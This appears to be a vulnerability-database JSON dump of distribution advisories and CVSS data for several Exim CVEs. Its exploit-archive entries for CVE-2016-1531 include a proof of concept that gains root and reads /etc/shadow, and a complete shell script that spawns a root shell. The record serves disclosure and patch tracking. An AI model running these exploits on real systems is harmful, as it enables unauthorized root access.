{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-13T09:53:45", "id": "FEDORA:27F05611D25E", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GQOBE27UXPWFWLYYSA5EAVR4NMT7NGES/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. It is freely available under the terms of the GNU General Public Licence. In style it is similar to Smail 3, but its facilities are more general. There is a great deal of flexibility in the way mail can be routed, and there are extensive facilities for checking incoming mail. Exim can be installed in place of sendmail, although the configuration of exim is quite different to that of sendmail. ", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-12T11:53:03", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: exim-4.86.2-1.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-12T11:53:03", "id": "FEDORA:D9A2F6002DDF", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3FRQKHOFVDX3TVCBL7KHLODFEIVWPJD6/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-12-07T16:20:43", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "alpinelinux", "title": "CVE-2017-1000369", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-12T13:35:00", "id": "ALPINE:CVE-2017-1000369", "href": "https://security.alpinelinux.org/vuln/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "redhatcve": [{"lastseen": "2021-09-02T22:51:58", 
"description": "It was found that Exim leaked DKIM signing private keys to the \"mainlog\" log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-16T08:47:23", "type": "redhatcve", "title": "CVE-2016-9963", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2020-04-08T19:36:12", "id": "RH:CVE-2016-9963", "href": "https://access.redhat.com/security/cve/cve-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-02T22:49:25", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. 
Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-06-21T08:50:36", "type": "redhatcve", "title": "CVE-2017-1000369", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-13T11:38:34", "id": "RH:CVE-2017-1000369", "href": "https://access.redhat.com/security/cve/cve-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2023-12-06T15:47:20", "description": "\n\nThe Exim project reports:\n\nExim leaks the private DKIM signing key to the log files.\n\t Additionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\n\t the key material is included in the bounce message.\n\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": 
"NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-15T00:00:00", "type": "freebsd", "title": "exim -- DKIM private key leak", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-15T00:00:00", "id": "E7002B26-CAAA-11E6-A76A-9F7324E5534E", "href": "https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T15:47:19", "description": "\n\nQualys reports:\n\n\n\t Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. 
Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.\n\t \n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "freebsd", "title": "exim -- Privilege escalation via multiple memory leaks", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T00:00:00", "id": "8C1A271D-56CF-11E7-B9FE-C13EB7BCBF4F", "href": "https://vuxml.freebsd.org/freebsd/8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-06T15:47:20", "description": "\n\nThe Exim development team reports:\n\nAll installations having Exim set-uid root and using 'perl_startup' are\n\tvulnerable to a local privilege escalation. Any user who can start an\n\tinstance of Exim (and this is normally any user) can gain root\n\tprivileges. 
If you do not use 'perl_startup' you should be safe.\n\n\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-26T00:00:00", "type": "freebsd", "title": "exim -- local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-02-26T00:00:00", "id": "7D09B9EE-E0BA-11E5-ABC4-6FB07AF136D2", "href": "https://vuxml.freebsd.org/freebsd/7d09b9ee-e0ba-11e5-abc4-6fb07af136d2.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:36", "description": "All installations having Exim set-uid root and using 'perl_startup' are\nvulnerable to a local privilege escalation. 
Any user who can start an\ninstance of Exim (and this is normally *any* user) can gain root\nprivileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-10T00:00:00", "type": "archlinux", "title": "exim: privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "ASA-201603-8", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000573.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-12-06T20:47:28", "description": "Arch Linux Security Advisory ASA-201711-32\n==========================================\n\nSeverity: Critical\nDate : 2017-11-30\nCVE-ID : CVE-2017-1000369 CVE-2017-10140 CVE-2017-16943 CVE-2017-16944\nPackage : exim\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-518\n\nSummary\n=======\n\nThe package exim before version 4.89.1-1 is vulnerable to multiple\nissues including arbitrary code execution, denial of service and\ninformation disclosure.\n\nResolution\n==========\n\nUpgrade to 4.89.1-1.\n\n# pacman -Syu \"exim>=4.89.1-1\"\n\nThe 
problems have been fixed upstream in version 4.89.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-1000369 (denial of service)\n\nAn uncontrolled resource consumption flaw has been discovered in Exim\nbefore 4.89.1. The use of multiple \"-p\" command line arguments which\nare malloc()'ed and never free()'ed results in leaking memory. While\nExim itself is not vulnerable to privilege escalation, this particular\nflaw can be used by the stackguard vulnerability to achieve privilege\nescalation.\n\n- CVE-2017-10140 (information disclosure)\n\nIt was found that Berkeley DB reads the DB_CONFIG configuration file\nfrom the current working directory by default. This happens when\ncalling db_create() with dbenv=NULL; or using the dbm_open() function.\nThis behavior leads to a security vulnerability because in the case of\nsetuid or setgid commands, excerpts of the file are revealed to the\ncalling user (and maybe more harm could be done with specially crafted\nDB_CONFIG files).\n\n- CVE-2017-16943 (arbitrary code execution)\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to execute arbitrary code or cause a\ndenial of service (use-after-free) via vectors involving BDAT commands.\n\n- CVE-2017-16944 (denial of service)\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service (infinite\nloop and stack exhaustion) via vectors involving BDAT commands and an\nimproper check for a '.' character signifying the end of the content,\nrelated to the bdat_getc function.\n\nImpact\n======\n\nA remote attacker is able to crash the application or execute arbitrary\ncode on the affected host. 
A local attacker is able to bypass access\nrestrictions to obtain sensitive data from local files or bypass the\nstack guard to elevate privileges on the system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56478\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\nhttps://git.exim.org/exim.git/commitdiff/65e061b76867a9ea7aeeb535341b790b90ae6c21\nhttps://access.redhat.com/security/vulnerabilities/stackguard\nhttp://seclists.org/oss-sec/2017/q2/452\nhttp://www.postfix.org/announcements/postfix-3.2.2.html\nhttps://git.exim.org/exim.git/commitdiff/98bf975ca462bebeaa1325d72381847c5118ff14\nhttp://openwall.com/lists/oss-security/2017/11/25/2\nhttps://bugs.exim.org/show_bug.cgi?id=2199\nhttps://git.exim.org/exim.git/commitdiff/4090d62a4b25782129cc1643596dc2f6e8f63bde\nhttps://github.com/LetUsFsck/PoC-Exploit-Mirror/tree/master/CVE-2017-16944\nhttps://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html\nhttps://bugs.exim.org/show_bug.cgi?id=2201\nhttps://git.exim.org/exim.git/commitdiff/178ecb70987f024f0e775d87c2f8b2cf587dd542\nhttps://www.exploit-db.com/exploits/43184/\nhttps://security.archlinux.org/CVE-2017-1000369\nhttps://security.archlinux.org/CVE-2017-10140\nhttps://security.archlinux.org/CVE-2017-16943\nhttps://security.archlinux.org/CVE-2017-16944", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-30T00:00:00", "type": "archlinux", "title": "[ASA-201711-32] exim: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-10140", "CVE-2017-16943", "CVE-2017-16944"], "modified": "2017-11-30T00:00:00", "id": "ASA-201711-32", "href": "https://security.archlinux.org/ASA-201711-32", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.86.2 - Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-10T00:00:00", "type": "exploitpack", "title": "Exim 4.86.2 - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "EXPLOITPACK:4D7480E2B540BD30AB455D1DDEFB98B3", "href": "", "sourceData": "=============================================\n- Advisory release date: 10.03.2016\n- Created by: 
Dawid Golunski\n- Severity: High/Critical\n=============================================\n\n\nI. VULNERABILITY\n-------------------------\n\nExim < 4.86.2 Local Root Privilege Escalation Exploit\n\n\nII. BACKGROUND\n-------------------------\n\n\"Exim is a message transfer agent (MTA) developed at the University of \nCambridge for use on Unix systems connected to the Internet. It is freely \navailable under the terms of the GNU General Public Licence. In style it is \nsimilar to Smail 3, but its facilities are more general. There is a great \ndeal of flexibility in the way mail can be routed, and there are extensive \nfacilities for checking incoming mail. Exim can be installed in place of \nSendmail, although the configuration of Exim is quite different.\"\n\nhttp://www.exim.org/\n\n\nIII. INTRODUCTION\n-------------------------\n\nWhen an Exim installation has been compiled with Perl support and contains a \nperl_startup configuration variable it can be exploited by malicious local \nattackers to gain root privileges.\n\nIV. DESCRIPTION\n-------------------------\n\nThe vulnerability stems from Exim in versions below 4.86.2 not performing \nsanitization of the environment before loading a perl script defined\nwith perl_startup setting in exim config.\n\nperl_startup is usually used to load various helper scripts such as\nmail filters, gray listing scripts, mail virus scanners etc.\n\nFor the option to be supported, exim must have been compiled with Perl \nsupport, which can be verified with:\n\n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL\nContent_Scanning DKIM Old_Demime PRDR OCSP\n\n\nTo perform the attack, attacker can take advantage of the exim's sendmail \ninterface which links to an exim binary that has an SUID bit set on it by \ndefault as we can see below:\n\n[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim \nlrwxrwxrwx. 
1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim\n\n[dawid@centos7 ~]$ ls -l /usr/sbin/exim\n-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim\n\n\nNormally, when exim sendmail interface starts up, it drops its root\nprivileges before giving control to the user (i.e entering mail contents for\nsending etc), however an attacker can make use of the following command line \nparameter which is available to all users:\n\n-ps This option applies when an embedded Perl interpreter is linked with \n Exim. It overrides the setting of the perl_at_start option, forcing the \n starting of the interpreter to occur as soon as Exim is started.\n\n\nAs we can see from the documentation at:\n\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\n\nthe perl_at_start option does the following:\n\n\"Setting perl_at_start (a boolean option) in the configuration requests a \nstartup when Exim is entered.\"\n\nTherefore it is possible to force the execution of the perl_startup script\ndefined in the Exim's main config before exim drops its root privileges.\n\n\nTo exploit this setting and gain the effective root privilege of the SUID binary,\nattackers can inject PERL5OPT perl environment variable, which does not get\ncleaned by affected versions of Exim.\n\nAs per perl documentation, the environment variable allows to set perl command-line \noptions (switches). Switches in this variable are treated as if they were on every\nPerl command line. \n\nThere are several interesting perl switches that that could be set by attackers to \ntrigger code execution. \nOne of these is -d switch which forces perl to enter an interactive debug mode \nin which it is possible to take control of the perl application.\n\nAn example proof of concept exploit using the -d switch can be found below.\n\n\nV. 
PROOF OF CONCEPT ROOT EXPLOIT\n-------------------------\n\n[dawid@centos7 ~]$ head /etc/exim/exim.conf \n######################################################################\n# Runtime configuration file for Exim #\n######################################################################\n\n# Custom filtering via perl\nperl_startup = do '/usr/share/exim4/exigrey.pl'\n\n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP\n\n[dawid@centos7 ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps victim@localhost\n\nLoading DB routines from perl5db.pl version 1.37\nEditor support available.\n\nEnter h or 'h h' for help, or 'man perldebug' for more help.\n\nDebugged program terminated. Use q to quit or R to restart,\n use o inhibit_exit to avoid stopping after program termination,\n h q, h R or h o to get additional info. \n\n DB<1> p system(\"id\");\nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n0\n DB<2> p system(\"head /etc/shadow\");\nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::\nbin:*:16372:0:99999:7:::\ndaemon:*:16372:0:99999:7::\n[...]\n\n\nVI. BUSINESS IMPACT\n-------------------------\n\nThis vulnerability could be exploited by attackers who have local access to the\nsystem to escalate their privileges to root which would allow them to fully\ncompromise the system.\n\nVII. SYSTEMS AFFECTED\n-------------------------\n\nExim versions before the latest patched version of Exim 4.86.2 are affected by \nthis vulnerability, if Exim was compiled with Perl support and the main \nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \na perl_startup option e.g:\n\nperl_startup = do '/usr/share/exim4/exigrey.pl'\n\nIt is important to note that the file does not necessarily have to exist\nto exploit the vulnerability. 
Although the path must be specified.\n\n\nVIII. SOLUTION\n-------------------------\n\nUpdate to Exim 4.86.2 which contains the official patch that fixes the\nenvironment sanitization issues.\n\nIX. REFERENCES\n-------------------------\n\nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt\nhttp://www.exim.org/\nhttp://www.exim.org/static/doc/CVE-2016-1531.txt\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f\n\nCVE-2016-1531\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531\n\nX. ADVISORY CREATED BY\n-------------------------\n\nThis advisory has been created by Dawid Golunski\ndawid (at) legalhackers (dot) com\nlegalhackers.com\n\nXI. REVISION HISTORY\n-------------------------\n\nMarch 10th, 2016: Advisory released\nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue\n\nXII. LEGAL NOTICES\n-------------------------\n\nThe information contained within this advisory is supplied \"as-is\" with\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.84-3 - Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-09T00:00:00", "type": "exploitpack", "title": "Exim 4.84-3 - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-09T00:00:00", "id": "EXPLOITPACK:D13F3E1C0485FC1698443786E9BA6A42", "href": "", "sourceData": "#!/bin/sh\n# CVE-2016-1531 exim <= 4.84-3 local root exploit\n# ===============================================\n# you can write files as root or force a perl module to\n# load by manipulating the perl environment and running\n# exim with the \"perl_startup\" argument -ps. 
\n#\n# e.g.\n# [fantastic@localhost tmp]$ ./cve-2016-1531.sh \n# [ CVE-2016-1531 local root exploit\n# sh-4.3# id\n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)\n# \n# -- Hacker Fantastic \necho [ CVE-2016-1531 local root exploit\ncat > /tmp/root.pm << EOF\npackage root;\nuse strict;\nuse warnings;\n\nsystem(\"/bin/sh\");\nEOF\nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-11T01:12:23", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2016-03-10T00:00:00", "type": "zdt", "title": "Exim < 4.86.2 - Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "1337DAY-ID-25544", "href": "https://0day.today/exploit/description/25544", "sourceData": "=============================================\r\n- Advisory release date: 10.03.2016\r\n- Created by: Dawid Golunski\r\n- Severity: High/Critical\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nExim < 4.86.2 Local Root Privilege Escalation Exploit\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"Exim is a message transfer agent (MTA) developed at the University of \r\nCambridge for use on Unix systems connected to the Internet. It is freely \r\navailable under the terms of the GNU General Public Licence. In style it is \r\nsimilar to Smail 3, but its facilities are more general. There is a great \r\ndeal of flexibility in the way mail can be routed, and there are extensive \r\nfacilities for checking incoming mail. Exim can be installed in place of \r\nSendmail, although the configuration of 